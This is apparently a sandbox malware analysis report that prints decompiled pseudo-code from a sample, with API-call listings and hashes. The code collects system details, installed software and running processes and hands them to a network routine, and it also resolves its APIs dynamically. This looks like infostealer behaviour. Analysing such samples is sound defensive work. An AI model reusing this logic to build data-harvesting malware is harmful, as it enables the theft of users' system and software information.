				wsprintfA(_t512,  *0x613544, _v76.wYear & 0x0000ffff, _v76.wMonth & 0x0000ffff, _v76.wDay & 0x0000ffff, _v76.wHour & 0x0000ffff, _v76.wMinute & 0x0000ffff, _v76.wSecond & 0x0000ffff);
				_t1031 = _t1030 + 0x20;
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v28, _t1041, _t512), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v28, _t1041, _t844), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v40, _t1041,  *0x6132d0), _t848,  &_v16);
				E004016EF(_v40);
				_t928 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t539 = GetTimeZoneInformation( &_v524); // executed
				if(_t539 != 0xffffffff) {
					_t839 = _v524;
					_t848 = 0xffffffc4;
					asm("cdq");
					_t1043 = _t839 % _t848;
					wsprintfA(_t928, "%d", _t839 / _t848);
					_t1031 = _t1031 + 0xc;
				}
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v28, _t1043, _t928), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v28, _t1043, _t844), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v40, _t1043,  *0x613394), _t848,  &_v16);
				E004016EF(_v40);
				_t556 =  *0x613678( &_v524, 0x55);
				_t1044 = _t556;
				if(_t556 != 0) {
					_t557 = LocalAlloc(0x40, 5);
					_t935 = _t557;
					CharToOemW( &_v524, _t557);
				} else {
					_t935 = 0x40fbe1;
				}
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v28, _t1044, _t935), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v28, _t1044, _t844), _t848,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t848,  &_v40, _t1044,  *0x6133f0), _t848,  &_v16);
				E004016EF(_v40);
				_t576 = E0040D271(_t1044,  &_v40); // executed
				_pop(_t849);
				E0040EAEF(E0040EB29( &_v16, _t849, _t576,  &_v28, _t1044), _t849,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E004016EF(_v40);
				E0040EAEF(E0040EB6B( &_v16, _t849,  &_v28, _t1044, _t844), _t849,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t849,  &_v40, _t1044,  *0x6130fc), _t849,  &_v16);
				E004016EF(_v40);
				if(GetSystemPowerStatus( &_v28) == 0) {
					L12:
					_t596 =  *0x613048; // 0x23f97a0
				} else {
					_t1046 = _v28.BatteryFlag - 0x80;
					_t596 =  *0x613334; // 0x23f9670
					if(_v28.BatteryFlag >= 0x80) {
						goto L12;
					}
				}
				E0040EAEF(E0040EB6B( &_v16, _t849,  &_v56, _t1046, _t596), _t849,  &_v16);
				E004016EF(_v56);
				E0040EAEF(E0040EB6B( &_v16, _t849,  &_v56, _t1046, _t844), _t849,  &_v16);
				E004016EF(_v56);
				E0040EAEF(E0040EB6B( &_v16, _t849,  &_v28, _t1046,  *0x6132ec), _t849,  &_v16);
				E004016EF(_v28.ACLineStatus);
				_t954 = OpenProcess(0x410, 0, GetCurrentProcessId());
				_t1047 = _t954;
				if(_t954 != 0) {
					 *0x613780(_t954, 0,  &_v612, 0x104); // executed
					CloseHandle(_t954);
				}
				E0040EA50( &_v40, _t1047,  &_v612);
				E0040EAEF(E0040EB29( &_v16, _t849,  &_v40,  &_v56, _t1047), _t849,  &_v16);
				E004016EF(_v56);
				E004016EF(_v40);
				E0040EAEF(E0040EB6B( &_v16, _t849,  &_v56, _t1047, _t844), _t849,  &_v16);
				E004016EF(_v56);
				E0040EAEF(E0040EB6B( &_v16, _t849,  &_v28, _t1047,  *0x6130c8), _t849,  &_v16);
				E004016EF(_v28.ACLineStatus);
				_v60 = 0xff;
				_t962 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t636 = RegOpenKeyExA(0x80000002,  *0x61312c, 0, 0x20119,  &_v44); // executed
				_t1048 = _t636;
				if(_t636 == 0) {
					RegQueryValueExA(_v44,  *0x613420, 0, 0, _t962,  &_v60); // executed
				}
				RegCloseKey(_v44);
				E0040EAEF(E0040EB6B( &_v16, _t849,  &_v56, _t1048, _t962), _t849,  &_v16);
				E004016EF(_v56);
				E0040EAEF(E0040EB6B( &_v16, _t849,  &_v56, _t1048, _t844), _t849,  &_v16);
				E004016EF(_v56);
				E0040EAEF(E0040EB6B( &_v16, _t849,  &_v28, _t1048,  *0x6132ac), _t849,  &_v16);
				E004016EF(_v28.ACLineStatus);
				E0040EAEF(E0040EB6B( &_v16, _t849,  &_v56, _t1048, E0040D364()), _t849,  &_v16);
				E004016EF(_v56);
				E0040EAEF(E0040EB6B( &_v16, _t849,  &_v56, _t1048, _t844), _t849,  &_v16);
				E004016EF(_v56);
				E0040EAEF(E0040EB6B( &_v16, _t849,  &_v28, _t1048,  *0x6133e0), _t849,  &_v16);
				E004016EF(_v28.ACLineStatus);
				GetSystemInfo( &_v320); // executed
				wsprintfA( &_v1612, "%d", _v320.dwNumberOfProcessors);
				_t1032 = _t1031 + 0xc;
				E0040EAEF(E0040EB6B( &_v16, _t849,  &_v56, _t1048,  &_v1612), _t849,  &_v16);
				E004016EF(_v56);
				E0040EAEF(E0040EB6B( &_v16, _t849,  &_v40, _t1048, _t844), _t849,  &_v16);
				E004016EF(_v40);
				E0040EAEF(E0040EB6B( &_v16, _t849,  &_v88, _t1048,  *0x613250), _t849,  &_v16);
				E004016EF(_v88);
				_t981 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t690 = 0;
				do {
					 *((char*)(_t1029 + _t690 - 0x158)) = 0;
					if (_t690 != 0) goto L19;
					_t690 = _t690 + 1;
				} while (_t690 < 0x40);
				_t691 =  &_v348;
				_v348 = 0x40;
				GlobalMemoryStatusEx(_t691); // executed
				_t1052 = _t691 - 1;
				if(_t691 != 1) {
					_t850 = 0;
					_t692 = 0;
					__eflags = 0;
				} else {
					_t833 = _v336;
					_t850 = (_t833 << 0x00000020 | _v340) >> 0x14;
					_t692 = _t833 >> 0x14;
				}
				wsprintfA(_t981, "%d MB", _t850);
				E0040EAEF(E0040EB6B( &_v16, _t850,  &_v56, _t1052, _t981), _t850,  &_v16);
				E004016EF(_v56);
				E0040EAEF(E0040EB6B( &_v16, _t850,  &_v88, _t1052, _t844), _t850,  &_v16);
				E004016EF(_v88);
				E0040EAEF(E0040EB6B( &_v16, _t850,  &_v28, _t1052,  *0x6130ac), _t850,  &_v16);
				E004016EF(_v28.ACLineStatus);
				_t709 =  *0x61371c( *0x613038, 0, 0, 0, _t692);
				_v44 = _t709;
				_t710 =  *0x6136c8(_t709, 8);
				_v92 = _t710;
				_t711 =  *0x6136c8(_v44, 0xa);
				_v60 = _t711;
				 *0x613760(0, _v44);
				wsprintfA(RtlAllocateHeap(GetProcessHeap(), 0, 0x104), "%dx%d", _v92, _v60);
				E0040EA50( &_v40, 0, _t714);
				E0040EAEF(E0040EB29( &_v16, _t850,  &_v40,  &_v88, 0), _t850,  &_v16);
				E004016EF(_v88);
				E004016EF(_v40);
				E0040EAEF(E0040EB6B( &_v16, _t850,  &_v260, 0, _t844), _t850,  &_v16);
				E004016EF(_v260);
				E0040EAEF(E0040EB6B( &_v16, _t850,  &_v248, 0,  *0x613510), _t850,  &_v16);
				E004016EF(_v248);
				E0040EAEF(E0040EB6B( &_v16, _t850,  &_v104, 0, _t844), _t850,  &_v16);
				E004016EF(_v104);
				E0040EAEF(E0040EB29( &_v16, _t850, E0040D423( &_v236, 0),  &_v104, 0), _t850,  &_v16);
				E004016EF(_v104);
				E004016EF(_v236);
				E0040EAEF(E0040EB6B( &_v16, _t850,  &_v224, 0,  *0x613528), _t850,  &_v16);
				E004016EF(_v224);
				_t846 = "\n";
				E0040EAEF(E0040EB6B( &_v16, _t850,  &_v152, 0, "\n"), _t850,  &_v16);
				E004016EF(_v152);
				E0040EAEF(E0040EB6B( &_v16, _t850,  &_v272, 0,  *0x613128), _t850,  &_v16);
				E004016EF(_v272);
				E0040EAEF(E0040EB6B( &_v16, _t850,  &_v188, 0, "\n"), _t850,  &_v16);
				E004016EF(_v188);
				E0040EAEF(E0040EB6B( &_v16, _t850,  &_v128, 0,  *0x61352c), _t850,  &_v16);
				E004016EF(_v128);
				_t773 = E0040D4D1(0,  &_v212, 0x80000002); // executed
				_pop(_t852);
				E0040EAEF(E0040EB29( &_v16, _t852, _t773,  &_v128, 0), _t852,  &_v16);
				E004016EF(_v128);
				E004016EF(_v212);
				E0040EAEF(E0040EB6B( &_v16, _t852,  &_v284, 0, "\n"), _t852,  &_v16);
				E004016EF(_v284);
				E0040EAEF(E0040EB6B( &_v16, _t852,  &_v116, 0,  *0x6134f0), _t852,  &_v16);
				E004016EF(_v116);
				_t792 = E0040D4D1(0,  &_v164, 0x80000001); // executed
				_pop(_t854);
				E0040EAEF(E0040EB29( &_v16, _t854, _t792,  &_v116, 0), _t854,  &_v16);
				E004016EF(_v116);
				E004016EF(_v164);
				E0040EAEF(E0040EB6B( &_v16, _t854,  &_v176, 0, "\n"), _t854,  &_v16);
				E004016EF(_v176);
				E0040EAEF(E0040EB6B( &_v16, _t854,  &_v200, 0, _t846), _t854,  &_v16);
				E004016EF(_v200);
				E0040EAEF(E0040EB6B( &_v16, _t854,  &_v140, 0,  *0x6134e4), _t854,  &_v16);
				E004016EF(_v140);
				_t815 = E0040D6D2( &(_v76.wDayOfWeek), 0); // executed
				E0040EAEF(E0040EB29( &_v16, _t854, _t815,  &_v140, 0), _t854,  &_v16);
				E004016EF(_v140);
				E004016EF(_v76.wDayOfWeek);
				_push( *0x61367c(_v16));
				_push(_v16);
				E0040EA50(_t1032 + 0x20 - 0xc, 0,  *0x6131ec);
				E00401581( &_a4, _t1032 + 0x20 - 0xffffffffffffffbc);
				_push( &(_v76.wDayOfWeek)); // executed
				E00403721(_t854, 0); // executed
				E004016EF(_v76.wDayOfWeek);
				E004016EF(_v16);
				return E00401562( &_a4);
			}

0x00409283
0x00409283
0x00409297
0x0040929c
0x004092b0
0x004092b8
0x004092d1
0x004092d9
0x004092ed
0x004092f5
0x0040930e
0x00409316
0x0040932a
0x00409332
0x0040934b
0x00409353
0x0040936b
0x00409373
0x0040938c
0x00409394
0x004093a8
0x004093b0
0x004093c9
0x004093d1
0x004093d9
0x004093ee
0x004093f6
0x004093fe
0x00409412
0x0040941a
0x00409433
0x0040943b
0x00409448
0x0040945c
0x00409474
0x0040947a
0x0040947c
0x00409490
0x00409490
0x00409499
0x004094ae
0x004094b6
0x004094ca
0x004094d2
0x004094eb
0x004094f3
0x004094f8
0x004094ff
0x00409506
0x0040950f
0x0040951c
0x0040951c
0x00409511
0x00409511
0x00409515
0x0040951a
0x00000000
0x00000000
0x0040951a
0x00409530
0x00409538
0x0040954c
0x00409554
0x0040956d
0x00409575
0x0040958e
0x00409596
0x004095aa
0x004095b2
0x004095cb
0x004095d3
0x004095ec
0x004095f4
0x00409608
0x00409610
0x00409629
0x00409631
0x00409640
0x0040964c
0x00409677
0x0040967d
0x0040968f
0x00409697
0x004096ab
0x004096b3
0x004096cc
0x004096d4
0x004096e9
0x004096f2
0x004096fb
0x004096fd
0x00409705
0x00409706
0x00409707
0x00409710
0x00409716
0x00409716
0x00409728
0x00409730
0x00409744
0x0040974c
0x00409765
0x0040976d
0x0040977b
0x00409781
0x00409783
0x00409790
0x00409796
0x004097a0
0x00409785
0x00409785
0x00409785
0x004097b5
0x004097bd
0x004097d1
0x004097d9
0x004097f2
0x004097fa
0x00409803
0x0040980a
0x00409819
0x00409821
0x00409829
0x0040983d
0x00409845
0x0040985e
0x00409866
0x00409877
0x00409884
0x00409884
0x00409879
0x00409879
0x0040987d
0x00409882
0x00000000
0x00000000
0x00409882
0x00409898
0x004098a0
0x004098b4
0x004098bc
0x004098d5
0x004098dd
0x004098f6
0x004098f8
0x004098fa
0x0040990b
0x00409912
0x00409912
0x00409922
0x00409937
0x0040993f
0x00409947
0x0040995b
0x00409963
0x0040997c
0x00409984
0x00409991
0x004099a5
0x004099bd
0x004099c3
0x004099c5
0x004099d9
0x004099d9
0x004099e2
0x004099f7
0x004099ff
0x00409a13
0x00409a1b
0x00409a34
0x00409a3c
0x00409a55
0x00409a5d
0x00409a71
0x00409a79
0x00409a92
0x00409a9a
0x00409aa6
0x00409abe
0x00409ac4
0x00409adc
0x00409ae4
0x00409af8
0x00409b00
0x00409b19
0x00409b21
0x00409b36
0x00409b38
0x00409b3a
0x00409b3a
0x00409b44
0x00409b46
0x00409b47
0x00409b4c
0x00409b53
0x00409b5d
0x00409b63
0x00409b66
0x00409b7d
0x00409b7f
0x00409b7f
0x00409b68
0x00409b68
0x00409b74
0x00409b78
0x00409b78
0x00409b89
0x00409ba1
0x00409ba9
0x00409bbd
0x00409bc5
0x00409bde
0x00409be6
0x00409bf6
0x00409bff
0x00409c02
0x00409c0d
0x00409c10
0x00409c19
0x00409c1d
0x00409c40
0x00409c4d
0x00409c62
0x00409c6a
0x00409c72
0x00409c89
0x00409c94
0x00409cb0
0x00409cbb
0x00409ccf
0x00409cd7
0x00409cf7
0x00409cff
0x00409d0a
0x00409d26
0x00409d31
0x00409d36
0x00409d4d
0x00409d58
0x00409d74
0x00409d7f
0x00409d96
0x00409da1
0x00409dba
0x00409dc2
0x00409dd3
0x00409ddb
0x00409dea
0x00409df2
0x00409dfd
0x00409e14
0x00409e1f
0x00409e38
0x00409e40
0x00409e51
0x00409e59
0x00409e68
0x00409e70
0x00409e7b
0x00409e92
0x00409e9d
0x00409eb4
0x00409ebf
0x00409edb
0x00409ee6
0x00409eee
0x00409f06
0x00409f11
0x00409f19
0x00409f27
0x00409f28
0x00409f36
0x00409f43
0x00409f4b
0x00409f4c
0x00409f57
0x00409f5f
0x00409f6f

APIs

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

Part of subcall function 0040EB6B: lstrlen.KERNEL32(?,?,?,0040D07A,00412124,00000000,00412124,00000000,0040FBE1), ref: 0040EB7F
Part of subcall function 0040EB6B: lstrcpy.KERNEL32(00000000,?), ref: 0040EBA7
Part of subcall function 0040EB6B: lstrcat.KERNEL32(?,00000000), ref: 0040EBB2

Part of subcall function 0040EAEF: lstrcpy.KERNEL32(00000000,?), ref: 0040EB1F

Part of subcall function 0040D12F: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,0040FBE1), ref: 0040D14F
Part of subcall function 0040D12F: GetVolumeInformationA.KERNEL32(?,00000000,00000000,0040C9E0,00000000,00000000,00000000,00000000,?,?,0040FBE1), ref: 0040D180
Part of subcall function 0040D12F: GetProcessHeap.KERNEL32(00000000,00000104,?,?,0040FBE1), ref: 0040D1C6
Part of subcall function 0040D12F: RtlAllocateHeap.NTDLL(00000000), ref: 0040D1CD

Part of subcall function 0040EB29: lstrcpy.KERNEL32(00000000,?), ref: 0040EB57
Part of subcall function 0040EB29: lstrcat.KERNEL32(?,00000000), ref: 0040EB61

GetProcessHeap.KERNEL32(00000000,00000104,00412120,00412120,0041214C,00412120,00412120,00412120,0040FBE1,?,?,?), ref: 0040944F
RtlAllocateHeap.NTDLL(00000000), ref: 00409456
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,?,?,?,?), ref: 00409474
RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,000000FF,?,?,?), ref: 00409490
RegCloseKey.ADVAPI32(?,?,?,?), ref: 00409499
GetCurrentProcess.KERNEL32(00000000,00412120,00000000,?,?,?), ref: 00409500
IsWow64Process.KERNEL32(00000000,?,?,?), ref: 00409507
GetProcessHeap.KERNEL32(00000000,00000104,00412120,00000000,00412120,00000000,00412120,023FA1C8,?,?,?), ref: 00409639
RtlAllocateHeap.NTDLL(00000000), ref: 00409640
GetLocalTime.KERNEL32(?,?,?,?), ref: 0040964C
wsprintfA.USER32 ref: 00409677
GetProcessHeap.KERNEL32(00000000,00000104,00412120,00000000), ref: 004096DC
RtlAllocateHeap.NTDLL(00000000), ref: 004096E3
GetTimeZoneInformation.KERNEL32(?), ref: 004096F2
wsprintfA.USER32 ref: 00409710
GetUserDefaultLocaleName.KERNEL32(?,00000055,00412120,00000000), ref: 0040977B
LocalAlloc.KERNEL32(00000040,00000005), ref: 00409790
CharToOemW.USER32(?,00000000), ref: 004097A0
GetSystemPowerStatus.KERNEL32(?), ref: 0040986F
GetCurrentProcessId.KERNEL32(00412120,023F97A0), ref: 004098E2
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004098F0
K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0040990B
CloseHandle.KERNEL32(00000000), ref: 00409912
GetProcessHeap.KERNEL32(00000000,00000104,00412120,?), ref: 00409998
RtlAllocateHeap.NTDLL(00000000), ref: 0040999F
RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00000000), ref: 004099BD
RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,000000FF), ref: 004099D9
RegCloseKey.ADVAPI32(00000000), ref: 004099E2
GetSystemInfo.KERNEL32(?,00412120,00000000,00412120,00000000), ref: 00409AA6
wsprintfA.USER32 ref: 00409ABE
GetProcessHeap.KERNEL32(00000000,00000104,00412120,?), ref: 00409B29
RtlAllocateHeap.NTDLL(00000000), ref: 00409B30
GlobalMemoryStatusEx.KERNEL32(00000000), ref: 00409B5D
wsprintfA.USER32 ref: 00409B89
GetProcessHeap.KERNEL32(00000000,00000104), ref: 00409C25
RtlAllocateHeap.NTDLL(00000000), ref: 00409C2C
wsprintfA.USER32 ref: 00409C40

Part of subcall function 0040D4D1: RegOpenKeyExA.KERNEL32( !A !A,00000000,00020019,80000002,0040FBE1,00000000,?), ref: 0040D50E

Part of subcall function 0040D4D1: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000,00412120), ref: 0040D550
Part of subcall function 0040D4D1: wsprintfA.USER32 ref: 0040D57A
Part of subcall function 0040D4D1: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0040D597
Part of subcall function 0040D4D1: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 0040D5C1
Part of subcall function 0040D4D1: lstrlen.KERNEL32(?), ref: 0040D5D6
Part of subcall function 0040D4D1: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,0041219C), ref: 0040D643

Part of subcall function 0040D6D2: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040D6F7
Part of subcall function 0040D6D2: Process32First.KERNEL32(00000000,00000128), ref: 0040D707
Part of subcall function 0040D6D2: Process32Next.KERNEL32(00000000,00000128), ref: 0040D759
Part of subcall function 0040D6D2: FindCloseChangeNotification.KERNEL32(00000000), ref: 0040D764

lstrlen.KERNEL32(?,00412120,00412120,00412120,00412120,00412120,00412120,00412120,00000000), ref: 00409F21

Part of subcall function 00403721: lstrlen.KERNEL32(?), ref: 0040377A
Part of subcall function 00403721: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004037C9
Part of subcall function 00403721: StrCmpCA.SHLWAPI(?), ref: 004037DE

Strings

@, xrefs: 00409B53
%dx%d, xrefs: 00409C3A
%d MB, xrefs: 00409B83

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Openwsprintf$CloseQueryValuelstrcpylstrlen$CurrentInformationLocalNameProcess32StatusSystemTimelstrcat$AllocChangeCharCreateDefaultDirectoryEnumFileFindFirstGlobalHandleInfoInternetLocaleMemoryModuleNextNotificationPowerSnapshotToolhelp32UserVolumeWindowsWow64Zone
String ID: %d MB$%dx%d$@
API String ID: 1885477443-1924514118
Opcode ID: 23d98f5383fac8b6b9e5d5d91033ea1ec0f7f0b6aa3f3c30f9df9783da7f7f26
Instruction ID: bef7b9731ff4016204bc9253d3cf6142904c4d54a588f426f1ed998e487cb07c
Opcode Fuzzy Hash: 23d98f5383fac8b6b9e5d5d91033ea1ec0f7f0b6aa3f3c30f9df9783da7f7f26
Instruction Fuzzy Hash: 7382B872E00019ABCF00FBA2DC829CDB7B6AF04308F5555B6B511B71A1DB397F5A8B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE01 Relevance: 46.7, APIs: 31, Instructions: 159
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E0040DE01(void* __ecx) {
				signed int _v8;
				struct HINSTANCE__* _t14;
				struct HINSTANCE__* _t17;
				struct HINSTANCE__* _t19;
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t21;
				struct HINSTANCE__* _t22;
				struct HINSTANCE__* _t23;
				_Unknown_base(*)()* _t24;
				intOrPtr* _t30;
				struct HINSTANCE__* _t54;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_v8 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)))))) + 0x18));
				_t54 = _v8;
				 *0x613798 = _t54;
				if(_t54 != 0) {
					_t30 = E0040DD70(__ecx);
					 *0x6136d8 = _t30;
					 *0x61360c =  *_t30(_t54,  *0x613158);
					 *0x61375c = GetProcAddress( *0x613798,  *0x6134ec);
					 *0x613600 = GetProcAddress( *0x613798,  *0x613558);
					 *0x61374c = GetProcAddress( *0x613798,  *0x6131b8);
					 *0x613628 = GetProcAddress( *0x613798,  *0x6131a4);
					 *0x613608 = GetProcAddress( *0x613798,  *0x613244);
					 *0x61379c = GetProcAddress( *0x613798,  *0x613408);
					 *0x613788 = GetProcAddress( *0x613798,  *0x613288);
					 *0x613660 = GetProcAddress( *0x613798,  *0x6134d4);
					 *0x613670 = GetProcAddress( *0x613798,  *0x613478);
					 *0x613714 = GetProcAddress( *0x613798,  *0x613304);
					 *0x613748 = GetProcAddress( *0x613798,  *0x613238);
					 *0x61373c = GetProcAddress( *0x613798,  *0x613520);
					 *0x6137e8 = GetProcAddress( *0x613798,  *0x613018);
					 *0x6137ac = GetProcAddress( *0x613798,  *0x6134cc);
					 *0x6137c4 = GetProcAddress( *0x613798,  *0x613178);
					 *0x61367c = GetProcAddress( *0x613798,  *0x613360);
					 *0x6136e4 = GetProcAddress( *0x613798,  *0x613548);
					 *0x6137ec = GetProcAddress( *0x613798,  *0x613024);
					 *0x613704 = GetProcAddress( *0x613798,  *0x613084);
					 *0x61370c = GetProcAddress( *0x613798,  *0x613204);
				}
				_t14 = LoadLibraryA( *0x613480); // executed
				 *0x6135dc = _t14;
				 *0x6136e8 = LoadLibraryA( *0x6130d4);
				 *0x6137cc = LoadLibraryA( *0x61305c); // executed
				_t17 = LoadLibraryA( *0x613134); // executed
				 *0x6136a0 = _t17;
				 *0x6136cc = LoadLibraryA( *0x613274);
				_t19 =  *0x6135dc; // 0x76170000
				if(_t19 != 0) {
					 *0x6136ac = GetProcAddress(_t19,  *0x6133e8);
				}
				_t20 =  *0x6136e8; // 0x76130000
				if(_t20 != 0) {
					 *0x61371c = GetProcAddress(_t20,  *0x61336c);
					 *0x6136c8 = GetProcAddress( *0x6136e8,  *0x613124);
				}
				_t21 =  *0x6137cc; // 0x762b0000
				if(_t21 != 0) {
					 *0x613760 = GetProcAddress(_t21,  *0x6132e0);
				}
				_t22 =  *0x6136a0; // 0x76b00000
				if(_t22 != 0) {
					 *0x613728 = GetProcAddress(_t22,  *0x613080);
				}
				_t23 =  *0x6136cc; // 0x77090000
				if(_t23 != 0) {
					_t24 = GetProcAddress(_t23,  *0x61335c);
					 *0x61378c = _t24;
					return _t24;
				}
				return _t23;
			}

0x0040de04
0x0040de05
0x0040de1d
0x0040de20
0x0040de23
0x0040de2b
0x0040de31
0x0040de3c
0x0040de4a
0x0040de61
0x0040de78
0x0040de8f
0x0040dea6
0x0040debd
0x0040ded4
0x0040deeb
0x0040df02
0x0040df19
0x0040df30
0x0040df47
0x0040df5e
0x0040df75
0x0040df8c
0x0040dfa3
0x0040dfba
0x0040dfd1
0x0040dfe8
0x0040dfff
0x0040e010
0x0040e010
0x0040e01b
0x0040e027
0x0040e038
0x0040e049
0x0040e04e
0x0040e05a
0x0040e065
0x0040e06a
0x0040e072
0x0040e081
0x0040e081
0x0040e086
0x0040e08d
0x0040e0a2
0x0040e0b3
0x0040e0b3
0x0040e0b8
0x0040e0bf
0x0040e0ce
0x0040e0ce
0x0040e0d3
0x0040e0da
0x0040e0e9
0x0040e0e9
0x0040e0ee
0x0040e0f5
0x0040e0fe
0x0040e104
0x00000000
0x0040e104
0x0040e10a

APIs

GetProcAddress.KERNEL32 ref: 0040DE55
GetProcAddress.KERNEL32 ref: 0040DE6C
GetProcAddress.KERNEL32 ref: 0040DE83
GetProcAddress.KERNEL32 ref: 0040DE9A
GetProcAddress.KERNEL32 ref: 0040DEB1
GetProcAddress.KERNEL32 ref: 0040DEC8
GetProcAddress.KERNEL32 ref: 0040DEDF
GetProcAddress.KERNEL32 ref: 0040DEF6
GetProcAddress.KERNEL32 ref: 0040DF0D
GetProcAddress.KERNEL32 ref: 0040DF24
GetProcAddress.KERNEL32 ref: 0040DF3B
GetProcAddress.KERNEL32 ref: 0040DF52
GetProcAddress.KERNEL32 ref: 0040DF69
GetProcAddress.KERNEL32 ref: 0040DF80
GetProcAddress.KERNEL32 ref: 0040DF97
GetProcAddress.KERNEL32 ref: 0040DFAE
GetProcAddress.KERNEL32 ref: 0040DFC5
GetProcAddress.KERNEL32 ref: 0040DFDC
GetProcAddress.KERNEL32 ref: 0040DFF3
GetProcAddress.KERNEL32 ref: 0040E00A
LoadLibraryA.KERNEL32(?,?,?,0040D03F), ref: 0040E01B
LoadLibraryA.KERNEL32(?,?,?,0040D03F), ref: 0040E02C
LoadLibraryA.KERNEL32(?,?,?,0040D03F), ref: 0040E03D
LoadLibraryA.KERNEL32(?,?,?,0040D03F), ref: 0040E04E
LoadLibraryA.KERNEL32(?,?,?,0040D03F), ref: 0040E05F
GetProcAddress.KERNEL32(76170000), ref: 0040E07B
GetProcAddress.KERNEL32(76130000), ref: 0040E096
GetProcAddress.KERNEL32 ref: 0040E0AD
GetProcAddress.KERNEL32(762B0000), ref: 0040E0C8
GetProcAddress.KERNEL32(76B00000), ref: 0040E0E3
GetProcAddress.KERNEL32(77090000), ref: 0040E0FE

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: c19d4b4a7c43ab53e113ab7591124094703acaefb29dcbc3d82bc8a7c482b300
Instruction ID: 206f63ac5111cb60363b32f9bea7dd2694c03ca568ecf5815b8e6c5d582c70e2
Opcode Fuzzy Hash: c19d4b4a7c43ab53e113ab7591124094703acaefb29dcbc3d82bc8a7c482b300
Instruction Fuzzy Hash: CC8106B5501261FFDB029F61FD089D47FA7F718711318E127E94792370D6368AA1AF88

Uniqueness

Uniqueness Score: -1.00%

Function 0040A802 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 211
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 19%

			E0040A802(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36) {
				CHAR* _v8;
				void* _v12;
				CHAR* _v16;
				char _v20;
				char _v24;
				char _v36;
				char _v300;
				char _v564;
				char _v828;
				char _v1092;
				struct _WIN32_FIND_DATAA _v1412;
				char _v2412;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t85;
				int _t99;
				void* _t109;
				int _t114;
				void* _t123;
				void* _t127;
				void* _t153;
				void* _t154;
				void* _t164;
				void* _t169;
